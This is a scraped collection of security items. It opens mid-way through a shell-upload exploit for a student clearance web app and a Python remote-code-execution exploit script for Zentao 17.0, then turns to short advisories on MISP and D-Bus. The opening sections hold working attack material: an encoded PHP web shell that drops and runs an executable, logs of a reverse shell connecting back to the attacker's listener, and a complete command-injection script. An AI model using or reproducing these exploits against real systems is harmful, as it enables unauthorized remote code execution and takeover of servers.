Hiw7Mp6FuEdP1wYWuhUTFJ6libBKCsrMZbB142LSypxWdAyEdoHZLmsqrQC3GieGkZHQBZOFhLxmeacNRRfn8UEEw6BSDv3/svZRg7AwtklaCK5QBKOUrB3DzG/k8Ut9RRigqUKlRh83jsdIZSLpGKlWAiLY5SKNOT6cPV+Li1EbA+LJbAkTSiNE6dV9/A4cQ6hcjulfbVVZmIu3Z8SvqJHrqhZmC2hymXipRuE7sLUjurA6kgukydUsZRzlDbPb3z4MkohUksLnEO4yPiQlX1EHLwaVmetlacrDvUkqyB8Trbk/U/GZeIu3qVseyKcIN/K//lV9XLR58ezHMIkUjMLq1wxES9VCU9I1a9ivB/eOJMPB9CqZDWODTaJwqSwqjjyyDdWw2ujU7fND/+iq/qlby6fnxEumy//OkMb1dGgomZhxRib9B07XlTLBsVuKr4wiwHnZdFqb8z+Yb8f4VCq1ZK2R6c9qAs9/eAfRmYn00uZBIXESp6YMtAnXQhg0uen5zzvTe7PIcjEsrSsvNUElSRD3unww3WhNDs9CypOP1sp7Rr/W1NiHDeOk7mQa1cfVG5zpy246x2pU531eShXlba8dkLYsCNVIhd5qwJmJTukgw4dGVsV2Z2b6lPztu86tVUuxePD25Uq6SZi/srizBWcgzGhPAwR7Z/5GkFLc2z7TOdM9if/6ADM0mFNQ9IQPpl+2JO8ec78bsd7GDAgT36LepLCyVqCAyCC8s4KkM6lZ3Xi13kctDIuZ+JalYDn9jaPD2UllObdJQzj4yLyVC+4QOAk8BANRN5eIRWen8JWOAwNyVyYJg+l2yTdEN3a6crkeIi3FnRAPUXKspM4Vcwc15YJHi5VrTULwkp3OmpyJMFZo5iKwRP4ecGx8X40QcYB5gm2KyxVHaI8DYCMi7Yyxi7NBQoYbzpVNoC87VkFDfaVHMDQYOEjSKL2BmKhG1/LHnxYCSEc06Um6OdpR6YZXcrhCzNt/O8QhgnTpRpVW78NVf1erdoBnNLmSh8RzdaOITCsu/p7fusfAjXE/dPkH4ppr2ALXgLPEER7G2OwW6Z9OZ1N24MNQhe1Vj0xmIY+MYx6rLYR1BG010DtIJjzC+bWIA+FU3QTtTvRle4hhLsPBGByJjRrAPVTPWEPH0y/MkC8YqIXNy2e1FgGMGMzuVYlHT92GhoAIwDoCdYmOEDPBw2FnoAJ3euzGO01InJYhPqH0HJEE9yte5EY8fRMAnJ45sUESifocFozaHmMHM5FAf0ZKTqi1cYQpH7mVUFM/DYwLhG5b9h9Ar16GihfI3DLT4qJj5kBkwzHZ4iG+rVoUqKX6auNa2O2YeKQ20JDCFuzDVjZpP5VO6QZ9ItFEMucDQ2ghgNMf1Nkgm224TYiMJv+469Iu2UkpZGCljZxAC2qdoI39ncSYeIA/y//C6S0HQBE7X/EvkBjzZ+wSjQu+RNWj8bG9v++bjOK30O1H9XnqGJvAwD99pu5eW8t+631fGsjQ2PXh/J8vD1CeDxApspOU8LoMU4KJMZ581H0jRsdHPmWAfAUQhFPkqoUKvO4ABAuhmeeT1yRSClWqQBgg+T10QzFYPRo91vMlUoVab9FYUqxGP3m0FzJ6+TXiQBfokhF//zoHVuRlimG0dozN+f/O7/5vwA="; 
$evalCode = gzinflate(base64_decode($payload)); 
$evalArguments = " ".$port." ".$ip; 
$tmpdir ="C:\\windows\\temp"; 
chdir($tmpdir); 
$res .= "Using dir : ".$tmpdir; 
$filename = "D3fa1t_shell.exe"; 
$file = fopen($filename, 'wb'); 
fwrite($file, $evalCode); 
fclose($file); 
$path = $filename; 
$cmd = $path.$evalArguments; 
$res .= "\n\nExecuting : ".$cmd."\n"; 
echo $res; 
$output = system($cmd);

?>

-----------------------------71268058833541201443517047173

Content-Disposition: form-data; name="btnedit"

-----------------------------71268058833541201443517047173--

========================================= 
End of Request 
=========================================

Response: 
========

HTTP/1.1 302 Found 
Date: Sat, 08 Oct 2022 09:30:51 GMT 
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 
X-Powered-By: PHP/7.4.30 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate 
Pragma: no-cache 
Location: edit-photo.php 
Connection: close 
Content-Type: text/html; charset=UTF-8 
Content-Length: 8575

======================================== 
End of Response 
========================================

The Reverse Shell is located at below URL 
-----------------------------------------

Request: URL - 
http://localhost/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/uploads/shell.php 
========

GET 
/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/uploads/shell.php 
HTTP/1.1 
Host: 192.168.1.12 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 
Firefox/91.0 
Accept: image/webp,*/* 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: close 
Referer: 
http://192.168.1.12/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php 
Cookie: PHPSESSID=9rnst2bfmbtrgapqsalerlrdjm

======================================== 
End of Request 
========================================

Response: 
=========

HTTP/1.1 200 OK 
Date: Sat, 08 Oct 2022 09:32:16 GMT 
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 
X-Powered-By: PHP/7.4.30 
Content-Length: 268 
Connection: close 
Content-Type: text/plain;charset=UTF-8

 
Notice: Undefined variable: res in 
C:\xampp\htdocs\student_clearance_system_Aurthur_Javis\student_clearance_system_Aurthur_Javis\uploads\shell.php 
on line 12 
Using dir : C:\windows\temp

Executing : D3fa1t_shell.exe 80 192.168.1.26

======================================== 
End of Response 
========================================

After uploading the reverse shell file you will get the reverse shell 
normally. If you don't get reverse shell then locate to 'uploads' folder.

Reverse Shell Remotely: 
======================

┌──(kali㉿kali)-[~] 
└─$ rlwrap nc -lvnp 80 
listening on [any] 80 ... 
connect to [192.168.1.26] from (UNKNOWN) [192.168.1.12] 65168 
b374k shell : connected

Microsoft Windows [Version 10.0.19043.2006] 
(c) Microsoft Corporation. All rights reserved.

whoami 
whoami 
l3v1ath0n\admin

C:\Windows\Temp>

Web Based Student Clearance 1.0 Shell Upload

Zentao Project Management System version 17.0 suffers from an authenticated remote code execution vulnerability.

# Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution# Exploit Author: mister0xf # Date: 2022-10-8# Software Link: https://github.com/easysoft/zentaopms# Version: tested on 17.0 (probably works also on newer/older versions)# Tested On: Kali Linux 2022.2# Exploit Tested Using: Python 3.10.4# Vulnerability Description:# Zentao Project Management System 17.0 suffers from an authenticated command injection allowing # remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver # Vulnerable Source Code:# /module/repo/model.php:# [...]# $client = $this->post->client; // <-- client is taken from the POST request# [...]# elseif($scm == 'Git')# {# if(!is_dir($path))# {# dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path);# return false;# }## if(!chdir($path))# {# if(!is_executable($path))# {# dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path);# return false;# }# dao::$errors['path'] = $this->lang->repo->error->path;# return false;# }## $command = "$client tag 2>&1"; // <-- command is injected here# exec($command, $output, $result);import requests,sysimport hashlibfrom urllib.parse import urlparsefrom bs4 import BeautifulSoupdef banner(): print(''' ::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: :::::::: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+ +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+########## ########## ### #### ######## ########### ### ### ######## ''')def usage(): print('Usage: zenciao user password http://127.0.0.1/path') def main(): if ((len(sys.argv)-1) != 3): usage() banner() exit() #proxy = {'http':'http://127.0.0.1:8080'} banner() username = sys.argv[1] password = sys.argv[2] target = sys.argv[3] # initialize session object session = requests.session() home_url = target+'/index.php' rand_url = target+'/index.php?m=user&f=refreshRandom&t=html' login_url = target+'/index.php?m=user&f=login&t=html' create_repo_url = target+'/index.php?m=repo&f=create&objectID=0' r1 = session.get(home_url) soup = BeautifulSoup(r1.text, "html.parser") script_tag = soup.find('script') redirect_url = script_tag.string.split("'")[1] r2 = session.get(target+redirect_url) # get random value session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) res = session.get(rand_url) rand = res.text # compute md5(md5(password)+rand) md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode()) # login request post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""} my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html' session.headers.update({'Referer': my_referer}) session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) response = session.post(login_url, data=post_data) # exploit rce # devops repo page r2 = session.get(create_repo_url) git_test_dir = '/home/' command = 'whoami;' exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""} r3 = session.post(create_repo_url, data=exploit_post_data) print(r3.content)if __name__ == '__main__': main()

Zentao Project Management System 17.0 Remote Code Execution

app/Controller/UsersController.php in MISP before 2.4.164 allows attackers to discover role names (this is information that only the site admin should have).

Permalink

Browse files

security: \[user\] Fixing disclosure of roles name to non-site admin us…

…ers and ensure user edit applies the restricted\_to\_site\_admin option

This vulnerability with a default MISP installation without additional roles is disclosing list of role name which were restricted to the site admin. This commit fixes this disclosure vulnerability.

In addition for MISP installation with custom roles, an org admin user could create a user assigned to new custom roles which were restricted to site admin. This could lead to the access of complementary permissions (except site admin, org admin and sync actions).

Credits: CIRCL

*   Loading branch information

CVE-2022-42724: security: [user] Fixing disclosure of roles name to non-site admin us… · MISP/MISP@934b9cd

An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash by sending a message with attached file descriptors in an unexpected format.

* Products
 * Openwall GNU/\*/Linux   _server OS_
 * Linux Kernel Runtime Guard
 * John the Ripper   _password cracker_
 * Free & Open Source for any platform
 * in the cloud
 * Pro for Linux
 * Pro for macOS
 * Wordlists   _for password cracking_
 * passwdqc   _policy enforcement_
 * Free & Open Source for Unix
 * Pro for Windows (Active Directory)
 * yescrypt   _KDF & password hashing_
 * yespower   _Proof-of-Work (PoW)_
 * crypt\_blowfish   _password hashing_
 * phpass   _ditto in PHP_
 * tcb   _better password shadowing_
 * Pluggable Authentication Modules
 * scanlogd   _port scan detector_
 * popa3d   _tiny POP3 daemon_
 * blists   _web interface to mailing lists_
 * msulogin   _single user mode login_
 * php\_mt\_seed   _mt\_rand() cracker_
* Services
* Publications
 * Articles
 * Presentations
* Resources
 * Mailing lists
 * Community wiki
 * Source code repositories (GitHub)
 * Source code repositories (CVSweb)
 * File archive & mirrors
 * How to verify digital signatures
 * OVE IDs
* What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 6 Oct 2022 09:52:53 +0100
From: Simon McVittie <smcv@...ian.org>
To: oss-security@...ts.openwall.com
Cc: dbus-security@...ts.freedesktop.org
Subject: dbus denial of service: CVE-2022-42010, -42011, -42012

dbus is the reference implementation of D-Bus, a message bus for
communication between applications and system services.

Evgeny Vereshchagin discovered several ways in which an authenticated
local attacker could cause a crash (denial of service) in
dbus-daemon --system or a custom DBusServer. In uncommon configurations
these could potentially be carried out by an authenticated remote attacker.

Fixed versions:

\* dbus 1.14.x >= 1.14.4 (stable branch)
\* dbus 1.12.x >= 1.12.24 (old stable branch)
\* dbus >= 1.15.2 (development branch)

Older dbus branches such as 1.10.x are EOL and will not receive new
upstream releases.

Vulnerable versions:

\* dbus 1.15.x before 1.15.2
\* dbus 1.14.x before 1.14.4
\* all versions before 1.12.24

CVE-2022-42010 is believed to have been introduced during early dbus
development (before 1.0) and the other two vulnerabilities mentioned
here were regressions in 1.3.0.

Vulnerability details:

\* An invalid array of fixed-length elements where the length of the array
 is not a multiple of the length of the element would cause an assertion
 failure in debug builds or an out-of-bounds read in production builds.
 This was a regression in version 1.3.0.
 (dbus#413, CVE-2022-42011, fixed by
 https://gitlab.freedesktop.org/dbus/dbus/-/commit/079bbf16186e87fb0157adf8951f19864bc2ed69)

\* A syntactically invalid type signature with incorrectly nested parentheses
 and curly brackets would cause an assertion failure in debug builds.
 Similar messages could potentially result in a crash or incorrect message
 processing in a production build, although we are not aware of a practical
 example. (dbus#418, CVE-2022-42010, fixed by
 https://gitlab.freedesktop.org/dbus/dbus/-/commit/9d07424e9011e3bbe535e83043d335f3093d2916)

\* A message in non-native endianness with out-of-band Unix file descriptors
 would cause a use-after-free and possible memory corruption in production
 builds, or an assertion failure in debug builds. This was a regression in
 version 1.3.0. (dbus#417, CVE-2022-42012, fixed by
 https://gitlab.freedesktop.org/dbus/dbus/-/commit/236f16e444e88a984cf12b09225e0f8efa6c5b44)

Reimplementations of the D-Bus protocol such as systemd's sd-bus (used
in dbus-broker and systemd) and GLib's GDBus (used in gvfs and ibus)
do not share dbus' code for message parsing and validation, so they are
probably unaffected by these issues.

-- 
Simon McVittie, Collabora Ltd. / Debian
on behalf of the dbus maintainers

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

Tag

#php